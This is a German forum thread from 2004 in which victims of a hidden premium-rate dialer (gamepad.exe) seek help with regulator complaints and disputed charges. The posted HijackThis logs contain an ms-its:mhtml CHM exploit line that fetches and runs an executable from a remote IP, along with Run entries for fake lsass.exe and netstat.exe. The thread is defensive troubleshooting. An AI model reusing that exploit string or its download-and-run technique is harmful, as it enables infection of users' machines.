# Hilfe! Dialer: 090090000928   gamepad.exe



## Anonymous (11 April 2004)

Hallo!
Soeben war ich ohne meines Wissens über die Nummer 090090000928 für 3:48 Minuten eingewählt.
Ich war über meinen XXL-Surfer online und bemerkte zu spät, das dessen Verbindung getrennt war, da ich zur Zeit, als der Dialer sich eingwählt haben muss, nicht vorm PC.
Ich habe ich mir nichts runtergeladen.  Der Reportdatei meines Dialerschutzes war zu entnehmen, dass ich über die Nummer *090090000928* mit *gamepad.exe *eingewählt war.  Ich trennte schnell die Verbindung. Von der gamepad.exe, die sich im Ordner /windows/system/shellext/gamepad.exe befinden sollte, war aber weit und breit keine Spur mehr.

Der Seite der Regulierungsbehörde ist zu entnehmen, dass die 090090000928  auf: 
microjuris.com
Inc.null

North Dupont Hwy. 435
19903 Dover, DE
VEREINIGTE STAATEN VON AMERIKA

..zugelassen ist. Das bringt mich nicht weiter.

Was soll ich jetzt machen? Hat jemand von Erfahrung mit diesem Dialer gemacht? 
Und wieviel wird das kosten???? Ich mache mir riesige Sorgen!
Bitte helft mir.


----------



## haudraufundschluss (11 April 2004)

Wenn man sich den Eintrag in der RegTP-Datenbank anschaut, dann hätte der Dialer bereits formal an den Registrierungshürden scheitern müssen. Du solltest Dich mit der Regulierungsbehörde in Verbindung setzen und anfragen, ob nicht vielleicht doch eine ladungsfähige Adresse von Inhalte- und Dialeranbieter hinterlegt wurde.


----------



## Anonymous (11 April 2004)

*habe mir das ding auch eingefangen!*

Hallo zusammen,

habe mir auch genau diesen Dialer auch eingefangen. habe nichts davon gemerkt, der dialer hat sich mittlerweile gelöscht, lässt sich aber mmit norton wiederherstellen.

eine ladungsfähige adresse des anbieters ist bei der reg TP vorhanden. hier der Link. 

http://www.regtp.de/mwdgesetz/start/fs_12.html

Kann mir jemand sagen, was dieser dialer für kosten verursacht oder wo ich das herausfinden kann. Wie kann ich gegen den Anbieter vorgehen und verhindern dass ich die entstandenen Kosten tragen muss?

Danke Mike


----------



## Fidul (12 April 2004)

*Re: habe mir das ding auch eingefangen!*



			
				gast schrieb:
			
		

> eine ladungsfähige adresse des anbieters ist bei der reg TP vorhanden.


Die RegTP zum Thema Registrierungsanträge:


> Anträge von Antragstellern mit einer Auslandsadresse, bei denen kein Empfangsbevollmächtigter mit einer ladungsfähigen Anschrift im Inland angegeben ist, werden nicht berücksichtigt. Der Antragsteller wird hierüber informiert.


2xUSA gilt also nicht. Da muß schon ein deutscher Strohmann her.


----------



## Anonymous (12 April 2004)

Ihr seid echt super!!!

Das muss doch illegal sein. Ein Dialer darf sich doch nicht einfach so einwählen und am Ende findet man ihn nicht mehr. Ich hoffe die RegTp reagiert schnell auf meine Anfrage. Ich will die Kosten keinesfalls tragen.
Ich bitte um weitere rege Beteiligung.


----------



## Anonymous (12 April 2004)

das Ding wollte sich gerade 2 mal schon wieder einwählen. mit YAW konnte ich das noch mal verhindern. Aber die gamepad.exe ist nicht zu finden.


----------



## sascha (12 April 2004)

Wie Fidul schon sagte: 2 x USA geht nicht. Bitte sofort Beschwerde bei der Reg TP einlegen (Beschwerdeformular z.B. bei http://www.dialerschutz.de/home/Downloads/downloads.html ) und nachträglichen Entzug der Registrierung des Dialers fordern.


----------



## Anonymous (12 April 2004)

sascha schrieb:
			
		

> Wie Fidul schon sagte: 2 x USA geht nicht. Bitte sofort Beschwerde bei der Reg TP einlegen (Beschwerdeformular z.B. bei http://www.dialerschutz.de/home/Downloads/downloads.html ) und nachträglichen Entzug der Registrierung des Dialers fordern.



Vielen Dank! Könntest du oder jemand anderes mir sagen, was ich in meinem Fall in diese Vorlage genau eintragen soll oder was zumindestens wichtig ist? Ich bin nämlich saumäßig nervös und werde das solange der Fall nicht abgeschloßen ist wohl auch bleiben.
Sollten meine Eltern, die Besitzer des Telefonanschluss sind oder ich -als Betroffener- das Formular ausfüllen?
Soll ich mich auch an die Telekom wenden oder macht das die RegTP?

Die Datenbank der RegTp befindet sich gerade im Wartungsmodes. Hm...


----------



## gueder (12 April 2004)

> Der Reportdatei meines Dialerschutzes war zu entnehmen, dass ich über die Nummer 090090000928 mit gamepad.exe eingewählt war



was ist das denn für ein schutzprogramm ?


----------



## Anonymous (12 April 2004)

gueder schrieb:
			
		

> > Der Reportdatei meines Dialerschutzes war zu entnehmen, dass ich über die Nummer 090090000928 mit gamepad.exe eingewählt war
> 
> 
> 
> was ist das denn für ein schutzprogramm ?


YAW


----------



## gueder (12 April 2004)

hallo gast,

ein dialerschutzprogramm - auch yaw - dient eigentlich dazu, dass es verbindungen blockiert, also nicht zulässt.


----------



## Anonymous (12 April 2004)

gueder schrieb:
			
		

> hallo gast,
> 
> ein dialerschutzprogramm - auch yaw - dient eigentlich dazu, dass es verbindungen blockiert, also nicht zulässt.



Hallo!
Ja, das weiß ich. Komischerweise bekam ich aber keine Warnmeldung. 

Darum geht es mir jetzt auch nicht wirklich. Ich will nur schnell mein Problem beseitigt haben. 
Brauche ich einen Nachweis dafür, dass sich die Nummer eingewählt hat? 

Euer Forum ist wirklich Klasse. Werde mich aufjedenfall registrieren, wenn das Problem -hoffentlich- gelöst ist.


----------



## gueder (12 April 2004)

da musst mal abwarten bis die wartung bei der regulierungsbehörde beendet ist und dann in der dialerdatenbank abfragen was da so für anbieter dahinterstecken. können auch hunderte sein....  wie gesagt abwarten.

was ich alledings nicht verstehe ist, dass ein dialerschutzprogramm eine verbindung zulässt ?? 

der schlimmste fall für dich wäre, dass du den pauschaltarif für maximal 30 euro bezahlen musst, ansonsten ist der höchste tarif 2 euro pro minute, was deutlich weniger ist.

wenn sich das ding ohne dein wissen und ohne die erforderlichen vorgaben der regtp eingwählt hat, wird es schwer dies zu beweisen.


----------



## Anonymous (12 April 2004)

Na ja, wie schon erwähnt: "Anträge von Antragstellern mit einer Auslandsadresse, bei denen kein Empfangsbevollmächtigter mit einer ladungsfähigen Anschrift im Inland angegeben ist, werden nicht berücksichtigt. Der Antragsteller wird hierüber informiert."
Und hier sind es beides Mal Leute aus den USA. Gilt also nicht. 
Ich hoffe die RegTP sieht das genauso. Noch warte ich ja auf eine Rückantwort.  :cry: 
Als Beweis hätte ich nur einen Eintrag im RVS Comm Center, der Nachweist, dass ich OHNE vorige Unterberechung direkt mit der 090090000928 online war. 
Zudem habe ich die angegebene Adresierungsseite nie besucht.


----------



## Anonymous (12 April 2004)

Meschede ist bestimmt wieder mit 1000 Dialern "überschwemmmmt" worden. Da kann sowas schon mal vorkommen. Sind halt auch nur Beamte. Selbst die Rufnummer gehört jemanden aus U.S.A. Die lachen sich kaputt über die deutschen Krautgesetze.

Stumpen


----------



## gueder (12 April 2004)

Veltins Pils kommt auch aus Meschede. Naja, wir haben Ostern, morgen wird dort wieder gearbeitet (hahaha).

Normalerweise sollte ein Empfangsbevollmächtigter dort auf der Seite erscheinen. Vielleicht haben die aber in ihrer internen Datei einen solchen deutschen Strohmann(frau) drinnen. Wenn nicht, ist die Frage, wie dieser Dialer die Registrierungshürde genommen hat.

Abwarten und einfach dort mal anrufen.


----------



## Anonymous (12 April 2004)

Glaubt ihr also, dass durchaus eine reelle Chance besteht, dass ich für diese Perfidie nich aufkommen muss?


----------



## gueder (12 April 2004)

ich gehe davon aus, dass die regtp dir einen solchen empfangsbevollmächtigen in deutschland nennen wird. so blöde sind die dialerleute auch nicht, dass sie einen wichtigen schritt übersehen haben. zudem könnte der dialer garnicht registriert werden oder es müsste ein mitarbeiter der regtp im schlaf sein ja und amen dazu gegeben haben.

morgen einfach mal anrufen: www.regtp.de


----------



## Anonymous (12 April 2004)

Na ja, ich hoffe mal, dass die Dialerleute wirklich so dumm waren und sich keinen Strohmann in Deutschland besorgt haben. 
Ich habe auch einen Thread hier im Forum zu diesem Dialer gefunden:  http://forum.computerbetrug.de/viewtopic.php?p=48039
Zudem ist mir aufgefallen, dass die 090090000928 bei der RegTP den Dateinamen "DIALER1.exe" hat. Bei mir hieß es aber "gamepad.exe".

@Gast Mike. Könnte ich mit dir per ICQ oder Mail in Kontakt treten? Vielleicht kann man das eine oder andere zum Thema austauschen.


----------



## Anonymous (12 April 2004)

Hmm, ich bin ja in meiner Ahnungslosigkeit leicht zu verwirren, aber ich finde unter der 090090000928 einen Inhalteanbieter, der in einem Bankzentrum in Philadelphia zu residieren behauptet, aber die Nummer passt nicht dazu. Ist nichts ungewöhnliches. Selbiger Inhalteanbieter wird aber von Herrn Peter H. mit dem Moldconecta-Dialer in Verbindung gebracht:



			
				Peter H. schrieb:
			
		

> zum Thema ex-dialer/090090000193
> 
> (...)
> Mittlerweil ist mir noch ein zweiter Server bekannt auf dem dieser Dialer zum Download bereitliegt: http://download4.dialer***.com/download/***
> ...


 (Hervorhebung und Rechtschreibkorrektur)

Rudy K hat übrigens eine web.de-e-mail-Adresse... (siehe whois brainsolutionsinc.com).

Letztlich ist dies alles aber die Arbeit der RegTP... Wenn die eine Regel haben, dass da ein deutscher Ansprechpartner stehen muss, dann ist das halt so - und da muss sich ein Herr Rudy K. dran halten. 

Oder?

Anhang: In diesem Wolkenkratzer das passende Büro zu finden, dürfte nicht einfach sein... (Adresse des Inhalteanbieters)


----------



## Aka-Aka (12 April 2004)

[email protected]: Ich war nicht mehr angemeldet... 


[email protected] (der sich mal anmelden könnte): Hast ja die passende (???) Nummer ebenfalls gefunden. Wie kommt's, dass Du nach der gamepad.exe fragst? Wieso wählt die gamepad.exe diese Nummer??? Beim angeblichen Adressierungsmerkmal (090090000928) laut RegTP findet man nichts ausser einer Weiterleitung zu einer mir aufgrund einer ganz anderen Abrechnung bekannten tschechischen Firma, die einen dann zu einer ebenfalls nicht unbekannten schweizerischen Firma mit deutschen Wurzeln schickt. Irgendeine Auffälligkeit ist mir nicht untergekommen, aber das gibt's ja hin und wieder, dass dialer eine multiple Persönlichkeit haben (Saulus, Paulus, Jekyll, Hyde) 

Mal sehen, was die RegTP meint, bin schon seeeehr gespannt...

aka


----------



## sascha (12 April 2004)

> In diesem Wolkenkratzer das passende Büro zu finden, dürfte nicht einfach sein...



Büro? Such nach dem Briefkasten. Mehr dürfte da ohnehin nicht zu finden sein...


----------



## Anonymous (12 April 2004)

@sascha: Stimmt, aber es reicht offenbar der RegTP völlig aus, wenn da Rumpelstilzchen c/o Frau Holle steht...

aka


----------



## sascha (12 April 2004)

> Stimmt, aber es reicht offenbar der RegTP völlig aus, wenn da Rumpelstilzchen c/o Frau Holle steht...



Es reicht ihr vermutlich nicht. Aber das Problem ist, dass sie gar nicht überprüft, *was* da in ihre Datenbank eingetragen wird. So gesehen wird Rumpelstilzchen c/o Frau Holle leider tatsächlich erst einmal durchgehen - bis sich eben die Beschwerden über Frau Holle häufen.


----------



## TSCoreNinja (13 April 2004)

sascha schrieb:
			
		

> Aber das Problem ist, dass sie gar nicht überprüft, *was* da in ihre Datenbank eingetragen wird.


Haben die vergessen, die Schreibberechtigung auf ihre Datenbank einzuschraenken, und tragen sich die Herren Dialeranbieter selbst ein? Oder machen das irgendwelche Aushilfen fuer 3,5 Euro die Stunde? Kann doch irgendwie nicht sein, dass so etwas keinem auffaellt. 


> So gesehen wird Rumpelstilzchen c/o Frau Holle leider tatsächlich erst einmal durchgehen - bis sich eben die Beschwerden über Frau Holle häufen.


Wenn das so lange dauert wie bei Matlock, haben eh 90 % der Geschaedigten gezahlt. Und von den restlichen 10 %  bleiben nur die Hartnaeckigen uebrig, weil Telekom und Co den Rest so einschuechtern laesst, dass auch die zahlen (Sperrung des Anschlusses, letzte aussergerichtliche Zahlungsaufforderung vor Zwangsvollstreckung etc). Its all just a little bit of history repeating.... Wenn eh keine Kontrolle durch die RegTP erfolgt, sollte man gleich dem schweizer Modell nacheifern, bald ist Dialer wg DSL eh uninteressant.
Gruesse,
TSCoreNinja


----------



## Anonymous (13 April 2004)

Ja, hallo ich bin's der  Beitragsersteller. (Ich habe mir mal jetzt einen richtigen Namen gegeben, um Verwirrungen zu verhindern)
Soeben habe ich nochmal eine Mail zur RegTP losgeschickt. Eine recht ausführliche (Doppelt hält besser  )
Ich würde alle Betroffenen und Leute, die auf diesen möglichen Missstand ebenfalls aufmerksam geworden sind, bitten die RegTP ebenfalls zu kontaktieren! 
Vielen Dank!
Ich werde euch aufjedenfall auf dem Lauenden halten.
Ich würde mich auch gerne mit Betroffenen per ICQ oder Mail austauschen.


----------



## Fidul (13 April 2004)

gueder schrieb:
			
		

> ein dialerschutzprogramm - auch yaw - dient eigentlich dazu, dass es verbindungen blockiert, also nicht zulässt.


Viele Dialer umgehen mittlerweile diese Schutzprogramme recht gekonnt.


----------



## Anonymous (13 April 2004)

Diese Nummer wird scheinbar von mehreren verschiedenen Dialern angewählt. Unser PC wird seit dem WE mehrmals am Tag 'überfallen', sprich es öffnet sich ein leeres Browserfenster mit folgender url: ht*p://69.61.56.230/psnet/index3.ems?SID=sodGLK200404131934297100pWu41F, die DSL-Verbindung wird unterbrochen und das PW überschrieben und automatisch eine neue Internetverbindung per ISDN-Modem erstellt - all das ohne irgendeine Abfrage und innerhalb weniger Sekunden. Mal nennt sich der Dialer gamepad.exe, beim nächsten Versuch exDialer. Komischerweise kann ich nie auch nur irgendeine verdächtige Datei auf dem PC ausfindig machen, Schutzprogramme wie AdAware oder Spybot etc. finden auch nichts...  :evil:


----------



## virenscanner (13 April 2004)

Kannst Du mal einen HiJackThis-Log posten?


----------



## SDJungle (13 April 2004)

Hier isser:


Logfile of HijackThis v1.97.7
Scan saved at 22:17:39, on 13.04.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
d:\Programme\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Fast.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\taskswitch.exe
C:\WINDOWS\System32\fast.exe
C:\Programme\Microsoft Hardware\Mouse\point32.exe
C:\Programme\ASUS\Probe\AsusProb.exe
D:\Programme\Roxio\WinOnCD 5 PE\DirectCD\DirectCD.exe
C:\Programme\QuickTime\qttask.exe
C:\Programme\Java\j2re1.4.2_03\bin\jusched.exe
D:\Programme\McAfee\QuickClean\PlgUni.exe
C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe
C:\Programme\Winamp\winampa.exe
C:\WINDOWS\netstat.exe
C:\WINDOWS\lsass.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\RUNDLL32.EXE
D:\PROGRA~1\AIM95\aim.exe
C:\Programme\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe
C:\Programme\TerraTec\DMX 6fire\DMX6Fire.exe
C:\Programme\Teledat\IWatch.exe
D:\Programme\ICQ\ICQ.exe
D:\Programme\LeechGet 2004\LeechGet.exe
C:\Dokumente und Einstellungen\Stefan S\Lokale Einstellungen\Temp\Temporäres Verzeichnis 1 für hijackthis.zip\HijackThis.exe
C:\Programme\Internet Explorer\iexplore.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.kaffee-netz.de/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Programme\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - d:\Programme\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [BackgroundSwitcher] C:\WINDOWS\System32\bgswitch.exe
O4 - HKLM\..\Run: [CoolSwitch] C:\WINDOWS\System32\taskswitch.exe
O4 - HKLM\..\Run: [FastUser] C:\WINDOWS\System32\fast.exe
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [ASUS Probe] C:\Programme\ASUS\Probe\AsusProb.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Mirabilis ICQ] D:\Programme\ICQ\ICQNet.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] "D:\Programme\Roxio\WinOnCD 5 PE\DirectCD\DirectCD.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programme\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [Imonitor] "D:\Programme\McAfee\QuickClean\PlgUni.exe" /START
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [WinampAgent] C:\Programme\Winamp\winampa.exe
O4 - HKLM\..\Run: [dlr] C:\WINDOWS\netstat.exe
O4 - HKLM\..\Run: [System Process] C:\WINDOWS\lsass.exe /i
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - HKCU\..\Run: [AIM] D:\PROGRA~1\AIM95\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [McAfee.InstantUpdate.Monitor] "C:\Programme\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe" /STARTMONITOR
O4 - HKCU\..\RunOnce: [ICQ] D:\Programme\ICQ\ICQ.exe -trayboot
O4 - Global Startup: DMX 6fire 2496 ControlPanel.lnk = ?
O4 - Global Startup: ISDNWatch.lnk = C:\Programme\Teledat\IWatch.exe
O4 - Global Startup: PlexTools Professional.lnk = D:\Programme\Plextor\PlexTool.exe
O8 - Extra context menu item: Mit dem LeechGet Wizard laden - file://D:\Programme\LeechGet 2004\\Wizard.html
O8 - Extra context menu item: Mit LeechGet herunterladen - file://D:\Programme\LeechGet 2004\\AddUrl.html
O8 - Extra context menu item: Mit LeechGet parsen - file://D:\Programme\LeechGet 2004\\Parser.html
O9 - Extra 'Tools' menuitem: Sun Java Konsole (HKLM)
O9 - Extra button: ICQ Pro (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: AIM (HKLM)
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {0DF86CB3-1923-11D5-B470-0050BA1B3C6F} (JpegServerPushControl Class) - http://217.6.17.16/ConvisionVideo.cab
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\bla.MHT!http://216.115.95.98//38ble.chm::/wincfgid.exe
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.imgfarm.com/images/nocache/funwebproducts/SmileyCentralInitialSetup1.0.0.6.cab
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/06a3390390e71a3d5622/netzip/RdxIE601_de.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52...pple.com/mickey/de/win/QuickTimeInstaller.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37987.4421180556
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0EFCB7CF-AE96-4422-BE15-5968F02A1826}: NameServer = 192.168.121.252,192.168.121.253
O17 - HKLM\System\CCS\Services\Tcpip\..\{CC47D214-CE27-471D-A85F-18C359759BB3}: NameServer = 62.225.244.197 194.25.2.129
O17 - HKLM\System\CS1\Services\Tcpip\..\{0EFCB7CF-AE96-4422-BE15-5968F02A1826}: NameServer = 192.168.121.252,192.168.121.253


----------



## SDJungle (13 April 2004)

...und gerade eben hat der Dialer wieder zugeschlagen - deshalb ein neuer Log, sozusagen auf frischer Ttat ertappt. Man müßte nur noch wissen WAS...  :evil: 

Logfile of HijackThis v1.97.7
Scan saved at 23:36:24, on 13.04.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
d:\Programme\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Fast.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\taskswitch.exe
C:\WINDOWS\System32\fast.exe
C:\Programme\Microsoft Hardware\Mouse\point32.exe
C:\Programme\ASUS\Probe\AsusProb.exe
D:\Programme\Roxio\WinOnCD 5 PE\DirectCD\DirectCD.exe
C:\Programme\QuickTime\qttask.exe
C:\Programme\Java\j2re1.4.2_03\bin\jusched.exe
D:\Programme\McAfee\QuickClean\PlgUni.exe
C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe
C:\Programme\Winamp\winampa.exe
C:\WINDOWS\netstat.exe
C:\WINDOWS\lsass.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\RUNDLL32.EXE
D:\PROGRA~1\AIM95\aim.exe
C:\Programme\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe
C:\Programme\TerraTec\DMX 6fire\DMX6Fire.exe
C:\Programme\Teledat\IWatch.exe
D:\Programme\LeechGet 2004\LeechGet.exe
C:\WINDOWS\System32\ShellExt\gamepad.EXE
D:\Programme\ICQ\ICQ.exe
C:\Dokumente und Einstellungen\Stefan S\Lokale Einstellungen\Temp\Temporäres Verzeichnis 2 für hijackthis.zip\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.kaffee-netz.de/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Programme\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - d:\Programme\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [BackgroundSwitcher] C:\WINDOWS\System32\bgswitch.exe
O4 - HKLM\..\Run: [CoolSwitch] C:\WINDOWS\System32\taskswitch.exe
O4 - HKLM\..\Run: [FastUser] C:\WINDOWS\System32\fast.exe
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [ASUS Probe] C:\Programme\ASUS\Probe\AsusProb.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Mirabilis ICQ] D:\Programme\ICQ\ICQNet.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] "D:\Programme\Roxio\WinOnCD 5 PE\DirectCD\DirectCD.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programme\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [Imonitor] "D:\Programme\McAfee\QuickClean\PlgUni.exe" /START
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [WinampAgent] C:\Programme\Winamp\winampa.exe
O4 - HKLM\..\Run: [dlr] C:\WINDOWS\netstat.exe
O4 - HKLM\..\Run: [System Process] C:\WINDOWS\lsass.exe /i
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - HKCU\..\Run: [AIM] D:\PROGRA~1\AIM95\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [McAfee.InstantUpdate.Monitor] "C:\Programme\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe" /STARTMONITOR
O4 - HKCU\..\RunOnce: [ICQ] D:\Programme\ICQ\ICQ.exe -trayboot
O4 - Global Startup: DMX 6fire 2496 ControlPanel.lnk = ?
O4 - Global Startup: ISDNWatch.lnk = C:\Programme\Teledat\IWatch.exe
O4 - Global Startup: PlexTools Professional.lnk = D:\Programme\Plextor\PlexTool.exe
O8 - Extra context menu item: Mit dem LeechGet Wizard laden - file://D:\Programme\LeechGet 2004\\Wizard.html
O8 - Extra context menu item: Mit LeechGet herunterladen - file://D:\Programme\LeechGet 2004\\AddUrl.html
O8 - Extra context menu item: Mit LeechGet parsen - file://D:\Programme\LeechGet 2004\\Parser.html
O9 - Extra 'Tools' menuitem: Sun Java Konsole (HKLM)
O9 - Extra button: ICQ Pro (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: AIM (HKLM)
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {0DF86CB3-1923-11D5-B470-0050BA1B3C6F} (JpegServerPushControl Class) - http://217.6.17.16/ConvisionVideo.cab
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\bla.MHT!http://216.115.95.98//38ble.chm::/wincfgid.exe
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.imgfarm.com/images/nocache/funwebproducts/SmileyCentralInitialSetup1.0.0.6.cab
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/06a3390390e71a3d5622/netzip/RdxIE601_de.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52...pple.com/mickey/de/win/QuickTimeInstaller.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37987.4421180556
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0EFCB7CF-AE96-4422-BE15-5968F02A1826}: NameServer = 192.168.121.252,192.168.121.253
O17 - HKLM\System\CCS\Services\Tcpip\..\{CC47D214-CE27-471D-A85F-18C359759BB3}: NameServer = 192.168.0.99
O17 - HKLM\System\CS1\Services\Tcpip\..\{0EFCB7CF-AE96-4422-BE15-5968F02A1826}: NameServer = 192.168.121.252,192.168.121.253


----------



## SDJungle (13 April 2004)

Tja...Log durchsucht - und gefunden: C:\WINDOWS\System32\ShellExt\gamepad.EXE 

Dachte ich jedenfalls. Denn als ich den Ordner gerade nach dieser gamepad.exe durchsuchte - war er leer....


----------



## Anonymous (13 April 2004)

*Mir gehts genau so!*

Mir gehts genau so! EILIGE HILFE ERBETEN!!!


----------



## Anonymous (13 April 2004)

Ich habe genau das gleiche Problem mit diesem Mistdialer. 2x hat er es wohl geschafft eine Verbindung aufzubauen, nachdem er die bestehende Verbindung einfach gekappt hat. Bemerkt habe ich es nur Weil "ISDN Watch" einen offenen Kanal angezeigt hat. Jetzt habe ich "Dialer Control" installiert und beim 3. mal konnte ich dann auch die "gamepad.exe" im angegebenen Verzeichnis finden (während "Dialer Control" auf meine Eingabe wartete). Nachdem ich "Dialer Control" gesagt habe, das ich natürlich keine Verbingung zu 090090000928 herstellen möchte, war das Verzeichnis auch gleich wieder leer.
Ich habe auch stark die Vermutung, das eine "lsass.exe" in c:\Windows\ mit im Spiel ist. ..wenn jemand die Gamepad.exe haben will ich kann sie ihm gerne zumailen 
Die grosse Frage die sich mir nun stellt: Was ist zu tun?
a) Wo muss ich mich womit beschweren?
b) Muss ich erst warten bis ich eine Telefonrechnung erhalte, bis ich aktiv werden kann?
c) Wie werde ich das verdammte Ding wieder los?


----------



## virenscanner (14 April 2004)

O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\bla.MHT!http://216.115.95.98//38ble.chm::/wincfgid.exe 

Das würde ich zuerst einmal "in's Auge fassen".


----------



## SDJungle (14 April 2004)

